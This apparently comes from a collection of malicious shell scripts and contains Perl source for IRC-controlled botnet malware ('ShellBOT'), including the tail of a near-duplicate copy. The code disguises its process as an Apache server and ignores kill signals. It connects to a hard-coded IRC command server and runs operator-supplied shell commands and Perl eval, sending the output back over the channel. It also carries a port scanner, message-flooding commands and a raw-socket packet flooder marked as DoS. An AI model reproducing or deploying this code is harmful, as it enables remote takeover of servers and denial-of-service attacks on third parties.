|
||||
chop $linha;
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
|
||||
if ($c == "$linas_max") {
|
||||
$c=0;
|
||||
sleep $sleep;
|
||||
}
|
||||
}
|
||||
exit;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
|
||||
sub attacker {
|
||||
my $iaddr = inet_aton($_[0]);
|
||||
my $msg = 'B' x $_[1];
|
||||
my $ftime = $_[2];
|
||||
my $cp = 0;
|
||||
my (%pacotes);
|
||||
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
|
||||
|
||||
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
|
||||
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
|
||||
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
|
||||
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
|
||||
return(undef) if $cp == 4;
|
||||
my $itime = time;
|
||||
my ($cur_time);
|
||||
while ( 1 ) {
|
||||
for (my $porta = 1; $porta <= 65535; $porta++) {
|
||||
$cur_time = time - $itime;
|
||||
last if $cur_time >= $ftime;
|
||||
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
|
||||
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
|
||||
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
|
||||
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
|
||||
|
||||
# DoS ?? :P
|
||||
for (my $pc = 3; $pc <= 255;$pc++) {
|
||||
next if $pc == 6;
|
||||
$cur_time = time - $itime;
|
||||
last if $cur_time >= $ftime;
|
||||
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
|
||||
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
|
||||
}
|
||||
}
|
||||
last if $cur_time >= $ftime;
|
||||
}
|
||||
return($cur_time, %pacotes);
|
||||
}
|
||||
|
||||
|
||||
|
||||
#############
|
||||
# ALIASES #
|
||||
#############
|
||||
|
||||
sub action {
|
||||
return unless $#_ == 1;
|
||||
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
|
||||
}
|
||||
|
||||
sub ctcp {
|
||||
return unless $#_ == 1;
|
||||
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
|
||||
}
|
||||
sub msg {
|
||||
return unless $#_ == 1;
|
||||
sendraw("PRIVMSG $_[0] :$_[1]");
|
||||
}
|
||||
|
||||
sub notice {
|
||||
return unless $#_ == 1;
|
||||
sendraw("NOTICE $_[0] :$_[1]");
|
||||
}
|
||||
|
||||
sub op {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +o $_[1]");
|
||||
}
|
||||
sub deop {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] -o $_[1]");
|
||||
}
|
||||
sub hop {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +h $_[1]");
|
||||
}
|
||||
sub dehop {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +h $_[1]");
|
||||
}
|
||||
sub voice {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +v $_[1]");
|
||||
}
|
||||
sub devoice {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] -v $_[1]");
|
||||
}
|
||||
sub ban {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +b $_[1]");
|
||||
}
|
||||
sub unban {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] -b $_[1]");
|
||||
}
|
||||
sub kick {
|
||||
return unless $#_ == 1;
|
||||
sendraw("KICK $_[0] $_[1] :$_[2]");
|
||||
}
|
||||
|
||||
sub modo {
|
||||
return unless $#_ == 0;
|
||||
sendraw("MODE $_[0] $_[1]");
|
||||
}
|
||||
sub mode { modo(@_); }
|
||||
|
||||
sub j { &join(@_); }
|
||||
sub join {
|
||||
return unless $#_ == 0;
|
||||
sendraw("JOIN $_[0]");
|
||||
}
|
||||
sub p { part(@_); }
|
||||
sub part {sendraw("PART $_[0]");}
|
||||
|
||||
sub nick {
|
||||
return unless $#_ == 0;
|
||||
sendraw("NICK $_[0]");
|
||||
}
|
||||
|
||||
sub invite {
|
||||
return unless $#_ == 1;
|
||||
sendraw("INVITE $_[1] $_[0]");
|
||||
}
|
||||
sub topico {
|
||||
return unless $#_ == 1;
|
||||
sendraw("TOPIC $_[0] $_[1]");
|
||||
}
|
||||
sub topic { topico(@_); }
|
||||
|
||||
sub whois {
|
||||
return unless $#_ == 0;
|
||||
sendraw("WHOIS $_[0]");
|
||||
}
|
||||
sub who {
|
||||
return unless $#_ == 0;
|
||||
sendraw("WHO $_[0]");
|
||||
}
|
||||
sub names {
|
||||
return unless $#_ == 0;
|
||||
sendraw("NAMES $_[0]");
|
||||
}
|
||||
sub away {
|
||||
sendraw("AWAY $_[0]");
|
||||
}
|
||||
sub back { away(); }
|
||||
sub quit {
|
||||
sendraw("QUIT :$_[0]");
|
||||
}
|
||||
|
||||
|
||||
|
||||
# DCC
|
||||
package DCC;
|
||||
|
||||
sub connections {
|
||||
my @ready = $dcc_sel->can_read(1);
|
||||
# return unless (@ready);
|
||||
foreach my $fh (@ready) {
|
||||
my $dcctipo = $DCC{$fh}{tipo};
|
||||
my $arquivo = $DCC{$fh}{arquivo};
|
||||
my $bytes = $DCC{$fh}{bytes};
|
||||
my $cur_byte = $DCC{$fh}{curbyte};
|
||||
my $nick = $DCC{$fh}{nick};
|
||||
|
||||
my $msg;
|
||||
my $nread = sysread($fh, $msg, 10240);
|
||||
|
||||
if ($nread == 0 and $dcctipo =~ /^(get|sendcon)$/) {
|
||||
$DCC{$fh}{status} = "Cancelado";
|
||||
$DCC{$fh}{ftime} = time;
|
||||
$dcc_sel->remove($fh);
|
||||
$fh->close;
|
||||
next;
|
||||
}
|
||||
|
||||
if ($dcctipo eq "get") {
|
||||
$DCC{$fh}{curbyte} += length($msg);
|
||||
|
||||
my $cur_byte = $DCC{$fh}{curbyte};
|
||||
|
||||
open(FILE, ">> $arquivo");
|
||||
print FILE "$msg" if ($cur_byte <= $bytes);
|
||||
close(FILE);
|
||||
|
||||
my $packbyte = pack("N", $cur_byte);
|
||||
print $fh "$packbyte";
|
||||
|
||||
if ($bytes == $cur_byte) {
|
||||
$dcc_sel->remove($fh);
|
||||
$fh->close;
|
||||
$DCC{$fh}{status} = "Recebido";
|
||||
$DCC{$fh}{ftime} = time;
|
||||
next;
|
||||
}
|
||||
} elsif ($dcctipo eq "send") {
|
||||
my $send = $fh->accept;
|
||||
$send->autoflush(1);
|
||||
$dcc_sel->add($send);
|
||||
$dcc_sel->remove($fh);
|
||||
$DCC{$send}{tipo} = 'sendcon';
|
||||
$DCC{$send}{itime} = time;
|
||||
$DCC{$send}{nick} = $nick;
|
||||
$DCC{$send}{bytes} = $bytes;
|
||||
$DCC{$send}{curbyte} = 0;
|
||||
$DCC{$send}{arquivo} = $arquivo;
|
||||
$DCC{$send}{ip} = $send->peerhost;
|
||||
$DCC{$send}{porta} = $send->peerport;
|
||||
$DCC{$send}{status} = "Enviando";
|
||||
|
||||
#de cara manda os primeiro 1024 bytes do arkivo.. o resto fik com o sendcon
|
||||
open(FILE, "< $arquivo");
|
||||
my $fbytes;
|
||||
read(FILE, $fbytes, 1024);
|
||||
print $send "$fbytes";
|
||||
close FILE;
|
||||
# delete($DCC{$fh});
|
||||
} elsif ($dcctipo eq 'sendcon') {
|
||||
my $bytes_sended = unpack("N", $msg);
|
||||
$DCC{$fh}{curbyte} = $bytes_sended;
|
||||
if ($bytes_sended == $bytes) {
|
||||
$fh->close;
|
||||
$dcc_sel->remove($fh);
|
||||
$DCC{$fh}{status} = "Enviado";
|
||||
$DCC{$fh}{ftime} = time;
|
||||
next;
|
||||
}
|
||||
open(SENDFILE, "< $arquivo");
|
||||
seek(SENDFILE, $bytes_sended, 0);
|
||||
my $send_bytes;
|
||||
read(SENDFILE, $send_bytes, 1024);
|
||||
print $fh "$send_bytes";
|
||||
close(SENDFILE);
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
sub SEND {
|
||||
my ($nick, $arquivo) = @_;
|
||||
unless (-r "$arquivo") {
|
||||
return(0);
|
||||
}
|
||||
|
||||
my $dccark = $arquivo;
|
||||
$dccark =~ s/[.*\/](\S+)/$1/;
|
||||
|
||||
my $meuip = $::irc_servers{"$::IRC_cur_socket"}{'meuip'};
|
||||
my $longip = unpack("N",inet_aton($meuip));
|
||||
|
||||
my @filestat = stat($arquivo);
|
||||
my $size_total=$filestat[7];
|
||||
if ($size_total == 0) {
|
||||
return(0);
|
||||
}
|
||||
|
||||
my ($porta, $sendsock);
|
||||
do {
|
||||
$porta = int rand(64511);
|
||||
$porta += 1024;
|
||||
$sendsock = IO::Socket::INET->new(Listen=>1, LocalPort =>$porta, Proto => 'tcp') and $dcc_sel->add($sendsock);
|
||||
} until $sendsock;
|
||||
|
||||
$DCC{$sendsock}{tipo} = 'send';
|
||||
$DCC{$sendsock}{nick} = $nick;
|
||||
$DCC{$sendsock}{bytes} = $size_total;
|
||||
$DCC{$sendsock}{arquivo} = $arquivo;
|
||||
|
||||
|
||||
&::ctcp("$nick", "DCC SEND $dccark $longip $porta $size_total");
|
||||
|
||||
}
|
||||
|
||||
sub GET {
|
||||
my ($arquivo, $dcclongip, $dccporta, $bytes, $nick) = @_;
|
||||
return(0) if (-e "$arquivo");
|
||||
if (open(FILE, "> $arquivo")) {
|
||||
close FILE;
|
||||
} else {
|
||||
return(0);
|
||||
}
|
||||
|
||||
my $dccip=fixaddr($dcclongip);
|
||||
return(0) if ($dccporta < 1024 or not defined $dccip or $bytes < 1);
|
||||
my $dccsock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>$dccip, PeerPort=>$dccporta, Timeout=>15) or return (0);
|
||||
$dccsock->autoflush(1);
|
||||
$dcc_sel->add($dccsock);
|
||||
$DCC{$dccsock}{tipo} = 'get';
|
||||
$DCC{$dccsock}{itime} = time;
|
||||
$DCC{$dccsock}{nick} = $nick;
|
||||
$DCC{$dccsock}{bytes} = $bytes;
|
||||
$DCC{$dccsock}{curbyte} = 0;
|
||||
$DCC{$dccsock}{arquivo} = $arquivo;
|
||||
$DCC{$dccsock}{ip} = $dccip;
|
||||
$DCC{$dccsock}{porta} = $dccporta;
|
||||
$DCC{$dccsock}{status} = "Recebendo";
|
||||
}
|
||||
|
||||
# po fico xato de organiza o status.. dai fiz ele retorna o status de acordo com o socket.. dai o ADM.pl lista os sockets e faz as perguntas
|
||||
sub Status {
|
||||
my $socket = shift;
|
||||
my $sock_tipo = $DCC{$socket}{tipo};
|
||||
unless (lc($sock_tipo) eq "chat") {
|
||||
my $nick = $DCC{$socket}{nick};
|
||||
my $arquivo = $DCC{$socket}{arquivo};
|
||||
my $itime = $DCC{$socket}{itime};
|
||||
my $ftime = time;
|
||||
my $status = $DCC{$socket}{status};
|
||||
$ftime = $DCC{$socket}{ftime} if defined($DCC{$socket}{ftime});
|
||||
|
||||
my $d_time = $ftime-$itime;
|
||||
|
||||
my $cur_byte = $DCC{$socket}{curbyte};
|
||||
my $bytes_total = $DCC{$socket}{bytes};
|
||||
|
||||
my $rate = 0;
|
||||
$rate = ($cur_byte/1024)/$d_time if $cur_byte > 0;
|
||||
my $porcen = ($cur_byte*100)/$bytes_total;
|
||||
|
||||
my ($r_duv, $p_duv);
|
||||
if ($rate =~ /^(\d+)\.(\d)(\d)(\d)/) {
|
||||
$r_duv = $3; $r_duv++ if $4 >= 5;
|
||||
$rate = "$1\.$2"."$r_duv";
|
||||
}
|
||||
if ($porcen =~ /^(\d+)\.(\d)(\d)(\d)/) {
|
||||
$p_duv = $3; $p_duv++ if $4 >= 5;
|
||||
$porcen = "$1\.$2"."$p_duv";
|
||||
}
|
||||
return("$sock_tipo","$status","$nick","$arquivo","$bytes_total", "$cur_byte","$d_time", "$rate", "$porcen");
|
||||
}
|
||||
|
||||
|
||||
return(0);
|
||||
}
|
||||
|
||||
|
||||
# esse 'sub fixaddr' daki foi pego do NET::IRC::DCC identico soh copiei e coloei (colokar nome do autor)
|
||||
sub fixaddr {
|
||||
my ($address) = @_;
|
||||
|
||||
chomp $address; # just in case, sigh.
|
||||
if ($address =~ /^\d+$/) {
|
||||
return inet_ntoa(pack "N", $address);
|
||||
} elsif ($address =~ /^[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}\.[12]?\d{1,2}$/) {
|
||||
return $address;
|
||||
} elsif ($address =~ tr/a-zA-Z//) { # Whee! Obfuscation!
|
||||
return inet_ntoa(((gethostbyname($address))[4])[0]);
|
||||
} else {
|
||||
return;
|
||||
}
|
||||
}
|
||||
|
704
xakep-shells/PERL/shellbot.pl.txt
Normal file
704
xakep-shells/PERL/shellbot.pl.txt
Normal file
|
@ -0,0 +1,704 @@
|
|||
#!/usr/bin/perl#
|
||||
###############################################################################################
|
||||
# ShellBOT - PacktsGr0up # # ____ _ _ #
|
||||
# | _ \ __ _ ___ | | __ ___ | |_ ___ #
|
||||
# | |_) |/ _` | / __|| |/ // _ \| __|/ __| #
|
||||
# | __/| (_| || (__ | <| __/| |_ \__ \ m?e te amo!! #
|
||||
# |_| _\__,_| \___||_|\_\\___| \__||___/ #
|
||||
# / ___| _ __ ___ _ _ _ __ #
|
||||
# | | _ | '__|/ _ \ | | | || '_ \ #
|
||||
# | |_| || | | (_) || |_| || |_) | #
|
||||
# \____||_| \___/ \__,_|| .__/ #
|
||||
# |_| #
|
||||
# #
|
||||
# Staff: Danilo #
|
||||
# #
|
||||
#adm: Danilo #
|
||||
###################################### CONFIGURACAO ###########################################
|
||||
my $processo = '/usr/local/apache/bin/httpd -DSSL'; # Nome do processo que vai aparece no ps #
|
||||
#----------------------------------------------################################################
|
||||
my $linas_max='5'; # Evita o flood :) depois de X linhas #
|
||||
#----------------------------------------------################################################
|
||||
my $sleep='10'; # ele dorme X segundos #
|
||||
########################################## IRC ################################################
|
||||
my @adms=("NOD32"); # Nick do administrador #
|
||||
#----------------------------------------------################################################
|
||||
my @canais=("#SSH :2007"); # Caso haja senha ("#hdr :hax0r") #
|
||||
#----------------------------------------------################################################
|
||||
my $nick='SSH-'; # Nick do bot. Caso esteja em uso vai aparecer #
|
||||
# aparecer com numero radonamico no final #
|
||||
#----------------------------------------------################################################
|
||||
my $ircname = 'SSH'; # User ID #
|
||||
#----------------------------------------------################################################
|
||||
chop (my $realname = `id`); # Full Name #
|
||||
#----------------------------------------------################################################
|
||||
$servidor='208.98.16.20' unless $servidor; # Servidor de irc que vai ser usado # # caso n?o seja especificado no argumento # #----------------------------------------------################################################
|
||||
my $porta='9001'; # Porta do servidor de irc #
|
||||
################ ACESSO A SHELL ###############################################################
|
||||
my $secv = 1; # 1/0 pra habilita/desabilita acesso a shell #
|
||||
###############################################################################################
|
||||
|
||||
my $VERSAO = '0.2';
|
||||
|
||||
$SIG{'INT'} = 'IGNORE';
|
||||
$SIG{'HUP'} = 'IGNORE';
|
||||
$SIG{'TERM'} = 'IGNORE';
|
||||
$SIG{'CHLD'} = 'IGNORE';
|
||||
$SIG{'PS'} = 'IGNORE';
|
||||
|
||||
use IO::Socket;
|
||||
use Socket;
|
||||
use IO::Select;
|
||||
chdir("/");
|
||||
$servidor="$ARGV[0]" if $ARGV[0];
|
||||
$0="$processo"."\0"x16;;
|
||||
my $pid=fork;
|
||||
exit if $pid;
|
||||
die "Problema com o fork: $!" unless defined($pid);
|
||||
|
||||
|
||||
|
||||
our %irc_servers;
|
||||
our %DCC;
|
||||
my $dcc_sel = new IO::Select->new();
|
||||
|
||||
########################################################################
|
||||
# Packets®Group CoRpOrAtIoN® - conquistaremos o mundo sem sair de casa!#
|
||||
########################################################################
|
||||
#BotNet Na Veia :P #
|
||||
####################
|
||||
|
||||
$sel_cliente = IO::Select->new();
|
||||
sub sendraw {
|
||||
if ($#_ == '1') {
|
||||
my $socket = $_[0];
|
||||
print $socket "$_[1]\n";
|
||||
} else {
|
||||
print $IRC_cur_socket "$_[0]\n";
|
||||
}
|
||||
}
|
||||
|
||||
sub conectar {
|
||||
my $meunick = $_[0];
|
||||
my $servidor_con = $_[1];
|
||||
my $porta_con = $_[2];
|
||||
|
||||
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con", PeerPort=>$porta_con) or return(1);
|
||||
if (defined($IRC_socket)) {
|
||||
$IRC_cur_socket = $IRC_socket;
|
||||
|
||||
$IRC_socket->autoflush(1);
|
||||
$sel_cliente->add($IRC_socket);
|
||||
|
||||
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
|
||||
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
|
||||
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
||||
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
|
||||
nick("$meunick");
|
||||
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
|
||||
sleep 1;
|
||||
}
|
||||
|
||||
}
|
||||
my $line_temp;
|
||||
while( 1 ) {
|
||||
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
|
||||
delete($irc_servers{''}) if (defined($irc_servers{''}));
|
||||
&DCC::connections;
|
||||
my @ready = $sel_cliente->can_read(0);
|
||||
next unless(@ready);
|
||||
foreach $fh (@ready) {
|
||||
$IRC_cur_socket = $fh;
|
||||
$meunick = $irc_servers{$IRC_cur_socket}{'nick'};
|
||||
$nread = sysread($fh, $msg, 4096);
|
||||
if ($nread == 0) {
|
||||
$sel_cliente->remove($fh);
|
||||
$fh->close;
|
||||
delete($irc_servers{$fh});
|
||||
}
|
||||
@lines = split (/\n/, $msg);
|
||||
|
||||
for(my $c=0; $c<= $#lines; $c++) {
|
||||
$line = $lines[$c];
|
||||
$line=$line_temp.$line if ($line_temp);
|
||||
$line_temp='';
|
||||
$line =~ s/\r$//;
|
||||
unless ($c == $#lines) {
|
||||
parse("$line");
|
||||
} else {
|
||||
if ($#lines == 0) {
|
||||
parse("$line");
|
||||
} elsif ($lines[$c] =~ /\r$/) {
|
||||
parse("$line");
|
||||
} elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
|
||||
parse("$line");
|
||||
} else {
|
||||
$line_temp = $line;
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
|
||||
|
||||
sub parse {
|
||||
my $servarg = shift;
|
||||
if ($servarg =~ /^PING \:(.*)/) {
|
||||
sendraw("PONG :$1");
|
||||
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
|
||||
my $pn=$1; my $onde = $4; my $args = $5;
|
||||
if ($args =~ /^\001VERSION\001$/) {
|
||||
notice("$pn", "\001VERSION ShellBOT-$VERSAO por 0ldW0lf\001");
|
||||
}
|
||||
if (grep {$_ =~ /^\Q$pn\E$/i } @adms) {
|
||||
if ($onde eq "$meunick"){
|
||||
shell("$pn", "$args");
|
||||
}
|
||||
if ($args =~ /^(\Q$meunick\E|\!nod)\s+(.*)/ ) {
|
||||
my $natrix = $1;
|
||||
my $arg = $2;
|
||||
if ($arg =~ /^\!(.*)/) {
|
||||
ircase("$pn","$onde","$1") unless ($natrix eq "!nod" and $arg =~ /^\!nick/);
|
||||
} elsif ($arg =~ /^\@(.*)/) {
|
||||
$ondep = $onde;
|
||||
$ondep = $pn if $onde eq $meunick;
|
||||
bfunc("$ondep","$1");
|
||||
} else {
|
||||
shell("$onde", "$arg");
|
||||
}
|
||||
}
|
||||
}
|
||||
} elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
|
||||
if (lc($1) eq lc($meunick)) {
|
||||
$meunick=$4;
|
||||
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
||||
}
|
||||
} elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
|
||||
nick("$meunick".int rand(9999));
|
||||
} elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
|
||||
$meunick = $2;
|
||||
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
|
||||
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
|
||||
foreach my $canal (@canais) {
|
||||
sendraw("JOIN $canal");
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub bfunc {
|
||||
my $printl = $_[0];
|
||||
my $funcarg = $_[1];
|
||||
if (my $pid = fork) {
|
||||
waitpid($pid, 0);
|
||||
} else {
|
||||
if (fork) {
|
||||
exit;
|
||||
} else {
|
||||
if ($funcarg =~ /^portscan (.*)/) {
|
||||
my $hostip="$1";
|
||||
my @portas=("21","22","23","25","53","80","110","143");
|
||||
my (@aberta, %porta_banner);
|
||||
foreach my $porta (@portas) {
|
||||
my $scansock = IO::Socket::INET->new(PeerAddr => $hostip, PeerPort => $porta, Proto => 'tcp', Timeout => 4);
|
||||
if ($scansock) {
|
||||
push (@aberta, $porta);
|
||||
$scansock->close;
|
||||
}
|
||||
}
|
||||
|
||||
if (@aberta) {
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :portas abertas: @aberta");
|
||||
} else {
|
||||
sendraw($IRC_cur_socket,"PRIVMSG $printl :Nenhuma porta aberta foi encontrada");
|
||||
}
|
||||
}
|
||||
if ($funcarg =~ /^pacota\s+(.*)\s+(\d+)\s+(\d+)/) {
|
||||
my ($dtime, %pacotes) = attacker("$1", "$2", "$3");
|
||||
$dtime = 1 if $dtime == 0;
|
||||
my %bytes;
|
||||
$bytes{igmp} = $2 * $pacotes{igmp};
|
||||
$bytes{icmp} = $2 * $pacotes{icmp};
|
||||
$bytes{o} = $2 * $pacotes{o};
|
||||
$bytes{udp} = $2 * $pacotes{udp};
|
||||
$bytes{tcp} = $2 * $pacotes{tcp};
|
||||
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002 - Status GERAL -\002");
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Tempo\002: $dtime"."s");
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total pacotes\002: ".($pacotes{udp} + $pacotes{igmp} + $pacotes{icmp} + $pacotes{o}));
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002Total bytes\002: ".($bytes{icmp} + $bytes {igmp} + $bytes{udp} + $bytes{o}));
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :\002M?dia de envio\002: ".int((($bytes{icmp}+$bytes{igmp}+$bytes{udp} + $bytes{o})/1024)/$dtime)." kbps");
|
||||
|
||||
|
||||
}
|
||||
exit;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
sub ircase {
|
||||
my ($kem, $printl, $case) = @_;
|
||||
|
||||
if ($case =~ /^join (.*)/) {
|
||||
j("$1");
|
||||
}
|
||||
if ($case =~ /^part (.*)/) {
|
||||
p("$1");
|
||||
}
|
||||
if ($case =~ /^rejoin\s+(.*)/) {
|
||||
my $chan = $1;
|
||||
if ($chan =~ /^(\d+) (.*)/) {
|
||||
for (my $ca = 1; $ca <= $1; $ca++ ) {
|
||||
p("$2");
|
||||
j("$2");
|
||||
}
|
||||
} else {
|
||||
p("$chan");
|
||||
j("$chan");
|
||||
}
|
||||
}
|
||||
if ($case =~ /^op/) {
|
||||
op("$printl", "$kem") if $case eq "op";
|
||||
my $oarg = substr($case, 3);
|
||||
op("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^deop/) {
|
||||
deop("$printl", "$kem") if $case eq "deop";
|
||||
my $oarg = substr($case, 5);
|
||||
deop("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^voice/) {
|
||||
voice("$printl", "$kem") if $case eq "voice";
|
||||
$oarg = substr($case, 6);
|
||||
voice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^devoice/) {
|
||||
devoice("$printl", "$kem") if $case eq "devoice";
|
||||
$oarg = substr($case, 8);
|
||||
devoice("$1", "$2") if ($oarg =~ /(\S+)\s+(\S+)/);
|
||||
}
|
||||
if ($case =~ /^msg\s+(\S+) (.*)/) {
|
||||
msg("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^flood\s+(\d+)\s+(\S+) (.*)/) {
|
||||
for (my $cf = 1; $cf <= $1; $cf++) {
|
||||
msg("$2", "$3");
|
||||
}
|
||||
}
|
||||
if ($case =~ /^ctcp\s+(\S+) (.*)/) {
|
||||
ctcp("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^ctcpflood\s+(\d+)\s+(\S+) (.*)/) {
|
||||
for (my $cf = 1; $cf <= $1; $cf++) {
|
||||
ctcp("$2", "$3");
|
||||
}
|
||||
}
|
||||
if ($case =~ /^invite\s+(\S+) (.*)/) {
|
||||
invite("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^nick (.*)/) {
|
||||
nick("$1");
|
||||
}
|
||||
if ($case =~ /^conecta\s+(\S+)\s+(\S+)/) {
|
||||
conectar("$2", "$1", 6667);
|
||||
}
|
||||
if ($case =~ /^send\s+(\S+)\s+(\S+)/) {
|
||||
DCC::SEND("$1", "$2");
|
||||
}
|
||||
if ($case =~ /^raw (.*)/) {
|
||||
sendraw("$1");
|
||||
}
|
||||
if ($case =~ /^eval (.*)/) {
|
||||
eval "$1";
|
||||
}
|
||||
}
|
||||
sub shell {
|
||||
return unless $secv;
|
||||
my $printl=$_[0];
|
||||
my $comando=$_[1];
|
||||
if ($comando =~ /cd (.*)/) {
|
||||
chdir("$1") || msg("$printl", "Diert?? inexistente!");
|
||||
return;
|
||||
}
|
||||
elsif ($pid = fork) {
|
||||
waitpid($pid, 0);
|
||||
} else {
|
||||
if (fork) {
|
||||
exit;
|
||||
} else {
|
||||
my @resp=`$comando 2>&1 3>&1`;
|
||||
my $c=0;
|
||||
foreach my $linha (@resp) {
|
||||
$c++;
|
||||
chop $linha;
|
||||
sendraw($IRC_cur_socket, "PRIVMSG $printl :$linha");
|
||||
if ($c == "$linas_max") {
|
||||
$c=0;
|
||||
sleep $sleep;
|
||||
}
|
||||
}
|
||||
exit;
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
#eu fiz um pacotadorzinhu e talz.. dai colokemo ele aki
|
||||
sub attacker {
|
||||
my $iaddr = inet_aton($_[0]);
|
||||
my $msg = 'B' x $_[1];
|
||||
my $ftime = $_[2];
|
||||
my $cp = 0;
|
||||
my (%pacotes);
|
||||
$pacotes{icmp} = $pacotes{igmp} = $pacotes{udp} = $pacotes{o} = $pacotes{tcp} = 0;
|
||||
|
||||
socket(SOCK1, PF_INET, SOCK_RAW, 2) or $cp++;
|
||||
socket(SOCK2, PF_INET, SOCK_DGRAM, 17) or $cp++;
|
||||
socket(SOCK3, PF_INET, SOCK_RAW, 1) or $cp++;
|
||||
socket(SOCK4, PF_INET, SOCK_RAW, 6) or $cp++;
|
||||
return(undef) if $cp == 4;
|
||||
my $itime = time;
|
||||
my ($cur_time);
|
||||
while ( 1 ) {
|
||||
for (my $porta = 1; $porta <= 65535; $porta++) {
|
||||
$cur_time = time - $itime;
|
||||
last if $cur_time >= $ftime;
|
||||
send(SOCK1, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{igmp}++;
|
||||
send(SOCK2, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{udp}++;
|
||||
send(SOCK3, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{icmp}++;
|
||||
send(SOCK4, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{tcp}++;
|
||||
|
||||
# DoS ?? :P
|
||||
for (my $pc = 3; $pc <= 255;$pc++) {
|
||||
next if $pc == 6;
|
||||
$cur_time = time - $itime;
|
||||
last if $cur_time >= $ftime;
|
||||
socket(SOCK5, PF_INET, SOCK_RAW, $pc) or next;
|
||||
send(SOCK5, $msg, 0, sockaddr_in($porta, $iaddr)) and $pacotes{o}++;;
|
||||
}
|
||||
}
|
||||
last if $cur_time >= $ftime;
|
||||
}
|
||||
return($cur_time, %pacotes);
|
||||
}
|
||||
|
||||
|
||||
|
||||
#############
|
||||
# ALIASES #
|
||||
#############
|
||||
|
||||
sub action {
|
||||
return unless $#_ == 1;
|
||||
sendraw("PRIVMSG $_[0] :\001ACTION $_[1]\001");
|
||||
}
|
||||
|
||||
sub ctcp {
|
||||
return unless $#_ == 1;
|
||||
sendraw("PRIVMSG $_[0] :\001$_[1]\001");
|
||||
}
|
||||
sub msg {
|
||||
return unless $#_ == 1;
|
||||
sendraw("PRIVMSG $_[0] :$_[1]");
|
||||
}
|
||||
|
||||
sub notice {
|
||||
return unless $#_ == 1;
|
||||
sendraw("NOTICE $_[0] :$_[1]");
|
||||
}
|
||||
|
||||
sub op {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +o $_[1]");
|
||||
}
|
||||
sub deop {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] -o $_[1]");
|
||||
}
|
||||
sub hop {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +h $_[1]");
|
||||
}
|
||||
sub dehop {
|
||||
return unless $#_ == 1;
|
||||
sendraw("MODE $_[0] +h $_[1]");
|
||||
}
|
||||
sub voice {
|
||||
return unless $#_ == 1;
|
